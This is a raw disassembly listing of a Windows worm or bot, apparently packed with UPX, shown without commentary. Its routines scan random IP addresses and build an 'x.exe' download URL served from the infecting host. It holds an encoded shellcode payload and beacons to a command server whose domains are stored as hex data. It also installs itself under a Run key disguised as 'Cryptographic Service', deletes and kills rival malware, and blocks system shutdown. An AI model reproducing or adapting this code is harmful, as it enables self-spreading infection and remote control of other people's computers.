loc_3143266F: ; CODE XREF: sub_3143256D+118�j
cmp [ebp+var_7C], 0Eh
jnb short loc_31432687
mov eax, [ebp+var_7C]
push [ebp+eax*4+var_50]
call sub_314320E4
pop ecx
inc [ebp+var_7C]
jmp short loc_3143266F
; ---------------------------------------------------------------------------
loc_31432687: ; CODE XREF: sub_3143256D+106�j
cmp [ebp+arg_0], edi
jz short loc_314326C5
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314310AC
call esi ; dword_314310AC
push offset aWininet ; "wininet"
call esi ; dword_314310AC
push offset aMsvcrt ; "msvcrt"
call esi ; dword_314310AC
push offset aAdvapi32 ; "advapi32"
call esi ; dword_314310AC
push offset aUser32 ; "user32"
call esi ; dword_314310AC
push offset aUterm20 ; "uterm20"
call sub_314320E4
pop ecx
mov dword_31435034, eax
loc_314326C5: ; CODE XREF: sub_3143256D+11D�j
call sub_314324C3
push edi
push offset sub_3143237F
call sub_314320F3
push edi
push offset sub_3143185D
call sub_314320F3
push edi
push offset loc_31432933
call sub_314320F3
add esp, 18h
loc_314326EE: ; CODE XREF: sub_3143256D+19C�j
call sub_31432559
test eax, eax
jnz short loc_3143270B
push edi
call dword_31431018 ; AbortSystemShutdownA
push 1388h
call dword_3143109C ; Sleep
jmp short loc_314326EE
; ---------------------------------------------------------------------------
loc_3143270B: ; CODE XREF: sub_3143256D+188�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_3143256D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432728 proc near ; DATA XREF: sub_3143278A+54�o
; sub_31432810+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31432737
push 1
pop eax
jmp short locret_31432786
; ---------------------------------------------------------------------------
loc_31432737: ; CODE XREF: sub_31432728+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
mov [ebp+var_1], al
xor bl, bl
loc_31432740: ; CODE XREF: sub_31432728+59�j
call sub_31432559
test eax, eax
jnz short loc_31432783
call sub_314321F3
test eax, eax
jz short loc_31432783
cmp [ebp+var_1], bl
jz short loc_3143277C
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_314319BC
pop ecx
call dword_314310FC ; rand
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call dword_3143109C ; Sleep
loc_3143277C: ; CODE XREF: sub_31432728+2D�j
inc bl
cmp bl, 0FFh
jb short loc_31432740
loc_31432783: ; CODE XREF: sub_31432728+1F�j
; sub_31432728+28�j
xor eax, eax
pop ebx
locret_31432786: ; CODE XREF: sub_31432728+D�j
leave
retn 4
sub_31432728 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3143278A proc near ; DATA XREF: sub_31432810+7E�o
; UPX0:314329CA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31432798
push 1
pop eax
jmp short loc_3143280C
; ---------------------------------------------------------------------------
loc_31432798: ; CODE XREF: sub_3143278A+7�j
push esi
push edi
call sub_314320B6
mov esi, dword_314310FC
xor edi, edi
loc_314327A7: ; CODE XREF: sub_3143278A+7C�j
call sub_31432559
test eax, eax
jnz short loc_31432808
call sub_314321F3
test eax, eax
jz short loc_31432808
call esi ; dword_314310FC
mov byte ptr [ebp+arg_0+2], al
call esi ; dword_314310FC
push offset dword_31435044
mov byte ptr [ebp+arg_0+3], al
call dword_314310D8 ; InterlockedIncrement
push [ebp+arg_0]
call sub_314319BC
test eax, eax
pop ecx
jnz short loc_314327EA
push [ebp+arg_0]
push offset sub_31432728
call sub_3143210D
pop ecx
pop ecx
loc_314327EA: ; CODE XREF: sub_3143278A+4F�j
call esi ; dword_314310FC
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call dword_3143109C ; Sleep
inc edi
cmp edi, 8000h
jl short loc_314327A7
loc_31432808: ; CODE XREF: sub_3143278A+24�j
; sub_3143278A+2D�j
pop edi
xor eax, eax
pop esi
loc_3143280C: ; CODE XREF: sub_3143278A+C�j
pop ebp
retn 4
sub_3143278A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432810 proc near ; DATA XREF: UPX0:314329E2�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_314320B6
call sub_31432559
test eax, eax
jnz loc_314328C9
push ebx
mov ebx, dword_3143109C
push esi
mov esi, dword_314310FC
push edi
loc_31432836: ; CODE XREF: sub_31432810+48�j
; sub_31432810+B0�j
call esi ; dword_314310FC
mov byte ptr [ebp+var_4+1], al
call esi ; dword_314310FC
mov byte ptr [ebp+var_4+3], al
call esi ; dword_314310FC
mov byte ptr [ebp+var_4+2], al
loc_31432845: ; CODE XREF: sub_31432810+3C�j
call esi ; dword_314310FC
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31432845
call sub_314321B4
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31432836
call sub_314321F3
test eax, eax
jz short loc_314328A1
push offset dword_31435044
call dword_314310D8 ; InterlockedIncrement
push edi
call sub_314319BC
test eax, eax
pop ecx
jnz short loc_314328A8
push edi
push offset sub_31432728
call sub_3143210D
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3143288D: ; CODE XREF: sub_31432810+8D�j
push edi
push offset sub_3143278A
call sub_3143210D
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3143288D
jmp short loc_314328A8
; ---------------------------------------------------------------------------
loc_314328A1: ; CODE XREF: sub_31432810+51�j
push 2710h
call ebx ; dword_3143109C
loc_314328A8: ; CODE XREF: sub_31432810+67�j
; sub_31432810+8F�j
call esi ; dword_314310FC
mov ecx, dword_3143504C
xor edx, edx
div ecx
add edx, ecx
push edx
call ebx ; dword_3143109C
call sub_31432559
test eax, eax
jz loc_31432836
pop edi
pop esi
pop ebx
loc_314328C9: ; CODE XREF: sub_31432810+11�j
push 0
call dword_314310D4 ; ExitThread
xor eax, eax
leave
retn 4
sub_31432810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314328D7 proc near ; CODE XREF: UPX0:314329A7�p
; UPX0:loc_31432A0D�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_314321B4
push eax
call dword_31431160 ; inet_ntoa
mov esi, dword_31431068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; dword_31431068
push dword_3143503C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_31431120 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314342E2
call esi ; dword_31431068
push offset byte_314342E0
call dword_31431088 ; lstrlenA
mov byte_314342E0[eax], 0DFh
pop esi
leave
retn
sub_314328D7 endp
; ---------------------------------------------------------------------------
loc_31432933: ; DATA XREF: sub_3143256D+174�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31435044, ebx
call sub_314321F3
mov esi, dword_3143109C
mov edi, 1388h
test eax, eax
jnz short loc_31432961
loc_31432955: ; CODE XREF: UPX0:3143295F�j
push edi
call esi ; dword_3143109C
call sub_314321F3
test eax, eax
jz short loc_31432955
loc_31432961: ; CODE XREF: UPX0:31432953�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31431134 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31435048, ebx
pop ebp
mov dword_3143504C, 96h
jz short loc_314329A0
mov dword_31435048, 1
mov ebp, 15Eh
mov dword_3143504C, 14h
loc_314329A0: ; CODE XREF: UPX0:31432985�j
call sub_314321B4
mov ebx, eax
call sub_314328D7
cmp ebx, 100007Fh
jz short loc_314329C1
push ebx
push offset sub_31432728
call sub_3143210D
pop ecx
pop ecx
loc_314329C1: ; CODE XREF: UPX0:314329B2�j
mov dword ptr [esp+10h], 4
loc_314329C9: ; CODE XREF: UPX0:314329DA�j
push ebx
push offset sub_3143278A
call sub_3143210D
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_314329C9
test ebp, ebp
jle short loc_314329F1
loc_314329E0: ; CODE XREF: UPX0:314329EF�j
push 0
push offset sub_31432810
call sub_3143210D
pop ecx
dec ebp
pop ecx
jnz short loc_314329E0
loc_314329F1: ; CODE XREF: UPX0:314329DE�j
; UPX0:314329FD�j ...
call sub_314321F3
test eax, eax
jz short loc_314329FF
push edi
call esi ; dword_3143109C
jmp short loc_314329F1
; ---------------------------------------------------------------------------
loc_314329FF: ; CODE XREF: UPX0:314329F8�j
; UPX0:31432A0B�j
call sub_314321F3
test eax, eax
jnz short loc_31432A0D
push edi
call esi ; dword_3143109C
jmp short loc_314329FF
; ---------------------------------------------------------------------------
loc_31432A0D: ; CODE XREF: UPX0:31432A06�j
call sub_314328D7
jmp short loc_314329F1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432A14 proc near ; CODE XREF: sub_31432BAD+93�p
; sub_31432D2E+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3143100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31432A47
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31431010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31431014 ; RegCloseKey
loc_31432A47: ; CODE XREF: sub_31432A14+1C�j
pop ebp
retn
sub_31432A14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432A49 proc near ; CODE XREF: sub_3143141F+28E�p
; sub_3143237F+33�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3143100C ; RegOpenKeyExA
test eax, eax
jz short loc_31432A75
push 1
pop eax
jmp short loc_31432A9F
; ---------------------------------------------------------------------------
loc_31432A75: ; CODE XREF: sub_31432A49+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31431008 ; RegQueryValueExA
test eax, eax
jz short loc_31432A94
push 2
pop esi
loc_31432A94: ; CODE XREF: sub_31432A49+46�j
push [ebp+arg_10]
call dword_31431014 ; RegCloseKey
mov eax, esi
loc_31432A9F: ; CODE XREF: sub_31432A49+2A�j
pop esi
leave
retn
sub_31432A49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432AA2 proc near ; CODE XREF: sub_3143141F+306�p
; sub_31432C62+96�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31431000 ; RegCreateKeyExA
test eax, eax
jz short loc_31432ACB
push 1
pop eax
jmp short loc_31432AF2
; ---------------------------------------------------------------------------
loc_31432ACB: ; CODE XREF: sub_31432AA2+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31431004 ; RegSetValueExA
test eax, eax
jz short loc_31432AE7
push 2
pop esi
loc_31432AE7: ; CODE XREF: sub_31432AA2+40�j
push [ebp+arg_4]
call dword_31431014 ; RegCloseKey
mov eax, esi
loc_31432AF2: ; CODE XREF: sub_31432AA2+27�j
pop esi
pop ebp
retn
sub_31432AA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432AF5 proc near ; CODE XREF: sub_31432BAD+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31431088 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_31432BA9
loc_31432B15: ; CODE XREF: sub_31432AF5+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31432B1E
dec esi
jns short loc_31432B15
loc_31432B1E: ; CODE XREF: sub_31432AF5+24�j
push 0
push 2
call sub_31432EFC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31432BA9
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31432EA6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31432EF6 ; Process32First
test eax, eax
jz short loc_31432BA9
lea esi, [esi+ebx+1]
loc_31432B66: ; CODE XREF: sub_31432AF5+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31431104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31432B96
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314310B4 ; OpenProcess
push 0
push eax
call dword_31431060 ; TerminateProcess
loc_31432B96: ; CODE XREF: sub_31432AF5+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31432EF0 ; Process32Next
test eax, eax
jnz short loc_31432B66
loc_31432BA9: ; CODE XREF: sub_31432AF5+1A�j
; sub_31432AF5+38�j ...
pop esi
pop ebx
leave
retn
sub_31432AF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432BAD proc near ; CODE XREF: UPX0:31432536�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31432C1D: ; CODE XREF: sub_31432BAD+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_31432C54
push ebx
push edi
push esi
call sub_31432A14
lea eax, [ebp+var_13C]
push eax
call sub_31432AF5
add esp, 10h
loc_31432C54: ; CODE XREF: sub_31432BAD+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31432C1D
pop edi
pop esi
pop ebx
leave
retn
sub_31432BAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432C62 proc near ; CODE XREF: sub_31432D2E+D1�p
; sub_31432D2E+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31432C77
push [ebp+arg_0]
call dword_31431074 ; DeleteFileA
loc_31432C77: ; CODE XREF: sub_31432C62+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31431090 ; GetSystemDirectoryA
test eax, eax
jz locret_31432D2C
push esi
call dword_314310FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_3143212E
mov esi, dword_3143108C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314341F0
push eax
call esi ; dword_3143108C
lea eax, [ebp+var_78]
push offset dword_314341F8
push eax
call esi ; dword_3143108C
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; dword_3143108C
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31431050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31431088 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_31432AA2
add esp, 14h
push dword_31435034
call dword_31431080 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31431054 ; WinExec
push 1F4h
call dword_3143109C ; Sleep
push 0
call dword_314310E4 ; ExitProcess
pop esi
locret_31432D2C: ; CODE XREF: sub_31432C62+23�j
leave
retn
sub_31432C62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31432D2E proc near ; CODE XREF: UPX0:3143253B�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31431048 ; GetModuleFileNameA
test eax, eax
jz loc_31432E67
and dword_31435050, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_1 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jz short loc_31432DB4
call dword_314310FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_3143212E
pop ecx
pop ecx
push ebx
call dword_31431088 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_31432AA2
add esp, 14h
jmp short loc_31432DC3
; ---------------------------------------------------------------------------
loc_31432DB4: ; CODE XREF: sub_31432D2E+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_31431068 ; lstrcpyA
loc_31432DC3: ; CODE XREF: sub_31432D2E+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jz short loc_31432E09
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_31432AA2
lea eax, [ebp+var_84]
push eax
push 0
call sub_31432C62
add esp, 1Ch
jmp short loc_31432E67
; ---------------------------------------------------------------------------
loc_31432E09: ; CODE XREF: sub_31432D2E+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3143104C ; lstrcmpiA
test eax, eax
jnz short loc_31432E52
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31432A49
add esp, 14h
test eax, eax
jnz short loc_31432E67
push ebx
push edi
push esi
mov dword_31435050, 1
call sub_31432A14
add esp, 0Ch
jmp short loc_31432E67
; ---------------------------------------------------------------------------
loc_31432E52: ; CODE XREF: sub_31432D2E+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31432C62
pop ecx
pop ecx
loc_31432E67: ; CODE XREF: sub_31432D2E+1F�j
; sub_31432D2E+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31432D2E endp
; =============== S U B R O U T I N E =======================================
sub_31432E6C proc near ; CODE XREF: sub_314311A0+CA�p
; sub_31431782+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31431044 ; VirtualAlloc
retn
sub_31432E6C endp
; =============== S U B R O U T I N E =======================================
sub_31432E80 proc near ; CODE XREF: sub_314311A0+10B�p
; sub_31431782+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31431040 ; VirtualFree
retn
sub_31432E80 endp
; ---------------------------------------------------------------------------
align 10h
loc_31432EA0: ; DATA XREF: sub_3143141F+A�o
; sub_3143256D+A�o
jmp dword ptr loc_31431100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EA6 proc near ; CODE XREF: sub_314319BC+128�p
; sub_314319BC+134�p ...
jmp dword_314310F8
sub_31432EA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EAC proc near ; CODE XREF: sub_314319BC+9C�p
; sub_314319BC+C5�p ...
jmp dword_314310F4
sub_31432EAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EB2 proc near ; CODE XREF: sub_314319BC+93�p
; sub_314319BC+B2�p ...
jmp dword_314310F0
sub_31432EB2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31432EC0 proc near ; CODE XREF: sub_314319BC+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31432EE0
loc_31432ECC: ; CODE XREF: sub_31432EC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31432ECC
loc_31432EE0: ; CODE XREF: sub_31432EC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31432EC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EF0 proc near ; CODE XREF: sub_31432AF5+AB�p
jmp dword_31431064
sub_31432EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EF6 proc near ; CODE XREF: sub_31432AF5+64�p
jmp dword_3143105C
sub_31432EF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31432EFC proc near ; CODE XREF: sub_31432AF5+2D�p
jmp dword_31431058
sub_31432EFC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 43Fh dup(0)
dword_31434000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_3143141F+11D�o
; sub_3143141F+20F�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31431782+84�o
align 10h
byte_31434080 db 0 ; DATA XREF: sub_3143185D+1B�r
off_31434081 dd offset dword_314341E4 ; DATA XREF: sub_3143185D+23�r
align 2
dd offset dword_314341D4
dw 0C401h
dd 1314341h, 314341B4h, 4341A000h, 41900131h, 80013143h
dd 314341h, 31434174h, 43416800h, 41580131h, 48003143h
dd 1314341h, 3143413Ch, 43417400h, 41D40131h, 30003143h
dd 314341h, 314341D4h, 43412001h, 41480031h, 10013143h
dd 314341h, 31434130h, 43410001h, 40F80131h, 74003143h
dd 314341h, 31434130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314341D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314341E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314341F0 dd 6578652Eh, 0 ; sub_31432239+55�o ...
dword_314341F8 dd 5Ch ; sub_31432C62+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314311A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31431313+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31431313+C�o
align 4
aD db '%d',0 ; DATA XREF: sub_3143141F+2CC�o
align 4
dword_3143426C dd 444952h aSoftwareMicros db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_3143141F+259�o
aZer1 db 'zer1',0 ; DATA XREF: sub_3143141F:loc_314315B7�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_3143141F+34�o
align 4
aHttpS db 'http://%s',0 ; DATA XREF: sub_31431782+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=20&cnt=%s',0
; DATA XREF: sub_31431782+57�o
align 10h
byte_314342E0 db 0EBh ; DATA XREF: sub_314319BC+24E�o
; sub_314319BC+260�o ...
db 58h
word_314342E2 dw 7468h ; DATA XREF: sub_314328D7+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
